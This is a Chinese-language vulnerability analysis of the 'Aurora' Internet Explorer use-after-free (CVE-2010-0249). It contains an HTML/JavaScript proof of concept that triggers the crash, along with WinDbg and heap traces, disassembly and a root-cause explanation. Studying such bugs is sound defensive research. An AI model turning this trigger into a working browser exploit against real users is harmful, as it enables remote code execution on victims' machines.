CVE-2010-0249 极光
传说中的极光漏洞
Microsoft Internet Explorer非法事件操作内存破坏漏洞
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。
Microsoft Internet Explorer在处理非法的事件操作时存在内存破坏漏洞。由于在创建对象以后没有增加相应的访问记数,恶意的对象操作流程可能导致指针指向被释放后重使用的内存,远程攻击者可通过诱使用户访问恶意网页非法操作内存在用户系统上执行指令。
POC如下
<html> <head> <script> var obj, event_obj; function ev1(evt) { event_obj = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 1); } function ev2() { var data, tmp; data = ""; tmp = unescape("%u0a0a%u0a0a"); for (var i = 0 ; i < 4 ; i++) data += tmp; for (i = 0 ; i < obj.length ; i++ ) { obj[i].data = data; } event_obj.srcElement; } obj = new Array(); event_obj = null; for (var i = 0; i < 200 ; i++ ) obj[i] = document.createElement("COMMENT"); </script> </head> <body> <span id="sp1"> <img src="aurora.gif" onload="ev1(event)"> </span> </body> </html>
没能找到合适的POC,这个是我用网上的exp修改来的,有些繁琐。
开门见山,直接看出了是CBody对象发生的UAF
1:020> g (c60.b2c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=04f8ef08 ebx=ffffffff ecx=07540fc8 edx=041bf0f4 esi=07540fc8 edi=06c64fb0 eip=6837c400 esp=041bf0e4 ebp=041bf0fc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CElement::Doc: 6837c400 8b01 mov eax,dword ptr [ecx] ds:0023:07540fc8=???????? 1:020> !heap -p -a ecx address 07540fc8 found in _DPH_HEAP_ROOT @ 1b1000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 7db21d4: 7540000 2000 702290b2 verifier!AVrfDebugPageHeapFree+0x000000c2 77285674 ntdll!RtlDebugFreeHeap+0x0000002f 77247aca ntdll!RtlpFreeHeap+0x0000005d 77212d68 ntdll!RtlFreeHeap+0x00000142 7710f1ac kernel32!HeapFree+0x00000014 683e0fa4 mshtml!CBodyElement::`scalar deleting destructor'+0x00000022 68387dd0 mshtml!CBase::SubRelease+0x00000022 6837c482 mshtml!CElement::PrivateRelease+0x0000002a 6837b034 mshtml!PlainRelease+0x00000025 683d669d mshtml!PlainTrackerRelease+0x00000014 6bd0a6f1 jscript!VAR::Clear+0x0000005f 6bd26d66 jscript!GcContext::Reclaim+0x000000b6 6bd24309 jscript!GcContext::CollectCore+0x00000123 6bd24a4a jscript!CScriptRuntime::Run+0x000039dc 6bd15c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce 6bd15bfb jscript!ScrFncObj::Call+0x0000008d 6bd15e11 jscript!CSession::Execute+0x0000015f 6bd0f3ee jscript!NameTbl::InvokeDef+0x000001b5 6bd0ea2e jscript!NameTbl::InvokeEx+0x0000012c 6bd096de jscript!NameTbl::Invoke+0x00000070 6834aa7b mshtml!CWindow::ExecuteTimeoutScript+0x00000087 6834ab66 mshtml!CWindow::FireTimeOut+0x000000b6 68376af7 mshtml!CStackPtrAry<unsigned long,12>::GetStackSize+0x000000b6 68371e57 mshtml!GlobalWndProc+0x00000183 76c686ef USER32!InternalCallWinProc+0x00000023 76c68876 USER32!UserCallWinProcCheckWow+0x0000014b 76c689b5 USER32!DispatchMessageWorker+0x0000035e 76c68e9c USER32!DispatchMessageW+0x0000000f 6ea704a6 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000452 6ea80446 IEFRAME!LCIETab_ThreadProc+0x000002c1 76a749bd iertutil!CIsoScope::RegisterThread+0x000000ab 77111174 kernel32!BaseThreadInitThunk+0x0000000e
比较诡异的是这个漏洞会有两种不同的crash情况。
1.
1:020> g (e18.18c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=046a3f08 ebx=ffffffff ecx=07c4afd0 edx=0434f1a4 esi=07acaf58 edi=07f9afb0 eip=684188c7 esp=0434f198 ebp=0434f1ac iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CEventObj::GenericGetElement+0x91: 684188c7 8b37 mov esi,dword ptr [edi] ds:0023:07f9afb0=????????
2.
1:021> g (4e4.f68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=073f5f08 ebx=ffffffff ecx=06e9bfc8 edx=040feeec esi=06e9bfc8 edi=097a2fb0 eip=6837c400 esp=040feedc ebp=040feef4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CElement::Doc: 6837c400 8b01 mov eax,dword ptr [ecx] ds:0023:06e9bfc8=????????
跟踪这个GenericGetElement函数发现是存在着调用关系
.text:74E78864 ; =============== S U B R O U T I N E ======================================= .text:74E78864 .text:74E78864 ; Attributes: bp-based frame .text:74E78864 .text:74E78864 ; private: long __thiscall CEventObj::GenericGetElement(struct IHTMLElement * *, long) .text:74E78864 ?GenericGetElement@CEventObj@@AAEJPAPAUIHTMLElement@@J@Z proc near .text:74E78864 ; CODE XREF: CEventObj::get_srcElement(IHTMLElement * *)+10p .text:74E78864 ; CEventObj::get_toElement(IHTMLElement * *)+10p ... .text:74E78864 .text:74E78864 var_8 = dword ptr -8 .text:74E78864 var_4 = dword ptr -4 .text:74E78864 arg_0 = dword ptr 8 .text:74E78864 arg_4 = dword ptr 0Ch .text:74E78864 arg_8 = dword ptr 10h .text:74E78864 .text:74E78864 ; FUNCTION CHUNK AT .text:74C3D32B SIZE 00000023 BYTES .text:74E78864 ; FUNCTION CHUNK AT .text:74E7F850 SIZE 0000001E BYTES .text:74E78864 ; FUNCTION CHUNK AT .text:74E8524A SIZE 00000030 BYTES .text:74E78864 ; FUNCTION CHUNK AT .text:74EB0C78 SIZE 00000022 BYTES .text:74E78864 .text:74E78864 mov edi, edi .text:74E78866 push ebp .text:74E78867 mov ebp, esp .text:74E78869 push ecx .text:74E7886A push ecx .text:74E7886B and [ebp+var_4], 0 .text:74E7886F push esi .text:74E78870 mov esi, [ebp+arg_4] .text:74E78873 test esi, esi .text:74E78875 jz loc_74EB0C78 .text:74E7887B push [ebp+arg_8] .text:74E7887E and dword ptr [esi], 0 .text:74E78881 push [ebp+arg_0] .text:74E78884 lea eax, [ebp+var_8] .text:74E78887 call ?GetUnknownPtr@CEventObj@@AAEJJPAPAUIUnknown@@@Z ; CEventObj::GetUnknownPtr(long,IUnknown * *) .text:74E7888C test eax, eax .text:74E7888E jz loc_74E78927 .text:74E78894 mov eax, [ebp+var_8] .text:74E78897 mov ecx, [ebp+arg_0] .text:74E7889A lea edx, [ebp+var_8] .text:74E7889D mov [esi], eax .text:74E7889F call ?GetParam@CEventObj@@QAEJPAPAUEVENTPARAM@@@Z ; CEventObj::GetParam(EVENTPARAM * *) .text:74E788A4 mov [ebp+var_4], eax .text:74E788A7 test eax, eax .text:74E788A9 jnz short loc_74E78927 .text:74E788AB mov eax, [ebp+arg_8] .text:74E788AE sub eax, 3E9h .text:74E788B3 push ebx .text:74E788B4 push edi .text:74E788B5 jnz loc_74E7F850 .text:74E788BB mov eax, [ebp+var_8] .text:74E788BE mov edi, [eax] .text:74E788C0 mov ebx, [eax+74h] .text:74E788C3 test edi, edi .text:74E788C5 jz short loc_74E78925 .text:74E788C7 mov esi, [edi] //一个crash地点 .text:74E788C9 test esi, esi .text:74E788CB jz short loc_74E78925 .text:74E788CD mov ecx, esi .text:74E788CF call ?Doc@CElement@@QBEPAVCDoc@@XZ ; CElement::Doc(void) //另一个crash地点
分析以上这段代码可以发现
CEventObj::GenericGetElement函数首先是通过CEventObj::GetUnknownPtr获取到一个数据结构的指针,然后从这个数据结构+00位置索引出一个值。这个值也是个指针,再用这个指针索引出一个值。而这个最后被索引出来的值就是被传入CElement::Doc中的ecx,也就是CBody元素的指针。
1:020> !heap -p -a eax address 06bf6f08 found in _DPH_HEAP_ROOT @ 1f1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 6ab2410: 6bf6f08 f8 - 6bf6000 2000 70228e89 verifier!AVrfDebugPageHeapAllocate+0x00000229 77284ea6 ntdll!RtlDebugAllocateHeap+0x00000030 77247d96 ntdll!RtlpAllocateHeap+0x000000c4 772134ca ntdll!RtlAllocateHeap+0x0000023a 683ec873 mshtml!EVENTPARAM::operator new+0x00000013 684fd2c5 mshtml!CDocument::createEventObject+0x00000083 68532791 mshtml!Method_IDispatchpp_o0oVARIANTp+0x000000ea 683f235c mshtml!CBase::ContextInvokeEx+0x000005dc 683f25d5 mshtml!CBase::InvokeEx+0x00000025 683fdf9a mshtml!DispatchInvokeCollection+0x0000014c 683b4998 mshtml!CDocument::InvokeEx+0x000000f0 683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020 683a3104 mshtml!PlainInvokeEx+0x000000eb 68a3a22a jscript!IDispatchExInvokeEx2+0x00000104 68a3a175 jscript!IDispatchExInvokeEx+0x0000006a 68a3a3f6 jscript!InvokeDispatchEx+0x00000098 68a3a4a0 jscript!VAR::InvokeByName+0x00000139 68a4d8c8 jscript!VAR::InvokeDispName+0x0000007d 68a4d96f jscript!VAR::InvokeByDispID+0x000000ce 68a451b6 jscript!CScriptRuntime::Run+0x00002a97 68a45c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce 68a45bfb jscript!ScrFncObj::Call+0x0000008d 68a45e11 jscript!CSession::Execute+0x0000015f 68a3f3ee jscript!NameTbl::InvokeDef+0x000001b5 68a3ea2e jscript!NameTbl::InvokeEx+0x0000012c 68a3a22a jscript!IDispatchExInvokeEx2+0x00000104 68a3a175 jscript!IDispatchExInvokeEx+0x0000006a 68a3f5f8 jscript!NameTbl::InvokeEx+0x0000037a 684019cb mshtml!CScriptCollection::InvokeEx+0x0000008a 683ff451 mshtml!CWindow::InvokeEx+0x000006ad 683a3148 mshtml!CBase::VersionedInvokeEx+0x00000020 683a3104 mshtml!PlainInvokeEx+0x000000eb
由上述的回溯可知,数据结构应该是EVENTPARAM。通过查阅资料得知EVENTPARAM+00位置的是CTreeNode的指针。
1:020> g Breakpoint 0 hit eax=04687fc8 ebx=0725efd0 ecx=00000034 edx=00000000 esi=0725ef08 edi=05570e00 eip=68323aa3 esp=043af658 ebp=043af664 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CImgElement::CImgElement: 68323aa3 8bff mov edi,edi 1:020> ? esi Evaluate expression: 119926536 = 0725ef08 1:020> g Breakpoint 1 hit eax=0989cfb0 ebx=00000000 ecx=0989cfb0 edx=00000000 esi=06fcdf40 edi=04687fc8 eip=6838ced0 esp=043af624 ebp=043af63c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 mshtml!CTreeNode::CTreeNode: 6838ced0 8bff mov edi,edi 1:020> ? eax Evaluate expression: 160026544 = 0989cfb0 1:020> g (b08.9bc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=098d4f08 ebx=ffffffff ecx=04687fc8 edx=043af044 esi=04687fc8 edi=0989cfb0 eip=6837c400 esp=043af034 ebp=043af04c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CElement::Doc: 6837c400 8b01 mov eax,dword ptr [ecx] ds:0023:04687fc8=???????? 1:020> dd 0989cfb0 0989cfb0 04687fc8 00000000 ffff4034 ffffffff 0989cfc0 00000051 00000000 abcdbbbb 00221000 0989cfd0 00000014 00001000 00000000 00000000 0989cfe0 0044e1c4 dcbabbbb 6ea50124 00000002 0989cff0 6ea4fef8 6ea500e4 6ea500d0 d0d0d0d0 0989d000 ???????? ???????? ???????? ???????? 0989d010 ???????? ???????? ???????? ???????? 0989d020 ???????? ???????? ???????? ????????
调试的结果证实了我的猜想。
这个洞的问题就是使用EVENTPARAM引用对象的时候,却没有增加对象的引用计数。导致了悬垂指针的产生。当对象的引用计数耗尽,对象就会被释放。但是EVENTPARAM的悬垂指针就产生了。